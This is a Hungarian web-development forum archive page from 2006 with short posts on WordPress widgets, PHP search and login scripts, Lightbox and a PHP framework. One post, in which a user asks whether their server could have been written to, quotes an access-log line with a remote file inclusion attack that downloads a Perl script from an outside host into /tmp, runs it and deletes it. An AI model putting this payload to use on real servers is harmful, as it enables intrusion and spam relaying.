Archívum - Már 31, 2006
WordPress widgetek
A widgetek új teret nyitnak a WordPress életében. A WordPress.com felhasználói által közel egy hónapig tesztelt, bővítmény formájában elérhető kiterjesztés segítségével a legcsekélyebb HTML tudás nélkül nyílik lehetősége a naplóírónak testreszabnia blogja oldalsávját; szabadon mozgathatja azt ott helyet foglaló elmeket, szükség szerint pedig újakkal is bővítheti a tárlatot.
Roll Your Own Search Engine with Zend_Search_Lucene
Kereső írása Zend_Search_Lucene-nel
■ Beléptető és azonosító rendszer PHP-ben
Sziasztok!
Tudtok valahol olyan helyet ahonnan kész beléptető és felhasználó azonosít php programokat lehetne letölteni vagy ajánlanni rá egy jó algoritmust?
Köszi
■ Tudtok valahol olyan helyet ahonnan kész beléptető és felhasználó azonosít php programokat lehetne letölteni vagy ajánlanni rá egy jó algoritmust?
Köszi
Lightbox felett jelenik meg a Flash animáció
Sziasztok!
Van egy olyan problémám, van ez a Lightbox script. Ezzel megnyitok egy képet, viszont a weboldalon lévő flash felül marad. Van ötletetek, hogy hogyan lehetne azt is hátra küldeni, ha a kép megjelenik és visszahozni, ha a kép eltűnik?
Köszi
■ Van egy olyan problémám, van ez a Lightbox script. Ezzel megnyitok egy képet, viszont a weboldalon lévő flash felül marad. Van ötletetek, hogy hogyan lehetne azt is hátra küldeni, ha a kép megjelenik és visszahozni, ha a kép eltűnik?
Köszi
Script futtatási kisérlet?
A rendszergazdánk ilyet talált az apache access.log-ban:A domain neveket kicseréltem, a fájlnevek valósak. Belép a /temp-be, letölt egy perl scriptet amit futtat majd torol. Én csak az nem értem, még ha sikerülne is beincludolnia a $_GET["cont"]-on keresztül egy távoli php fájlt (nem sikerült, de tetelezzuk fel), az akkor sem a mi szerverünkön hajtódna végre, hanem a tavoli-domain.com-on. Innentől kezdve azt tudom elképzelni, hogy a tavoli-domain.com-on akartak scriptet futtatni, és ezzel a probalkozassal a mi szerevrünk ip-címe kerülne be az ottani access.log-ba. Jól gondolom?
Ennek ellenére csak sikerült a mi szerverünk /temp-jébe is irni, a levelezőszerverünkön keresztül spam-eket probaltak küldeni egy scripttel.
Egyéb tényezőktöl eltekintve (miért van wget,perl,php system() függvény engedélyezve), nyugtassatok meg, h a fenti próbálkozással nem lehet irni a /temp-be.
■ valami.php?cont=http://tavoli-domain.com/tool.gif?&cmd=cd%20/tmp/;wget%20http://tavoli-domain2.com/gif.txt;perl%20gif.txt;rm%20-rf%20gif*Ennek ellenére csak sikerült a mi szerverünk /temp-jébe is irni, a levelezőszerverünkön keresztül spam-eket probaltak küldeni egy scripttel.
Egyéb tényezőktöl eltekintve (miért van wget,perl,php system() függvény engedélyezve), nyugtassatok meg, h a fenti próbálkozással nem lehet irni a /temp-be.
Qcodo - PHP Development Framework
Na megint egy újabb PHP keretrendszer? Igen, de azért ajánlom mindenkinek a demó flashek megtekintését: lehet szerényedni. :)
■ 
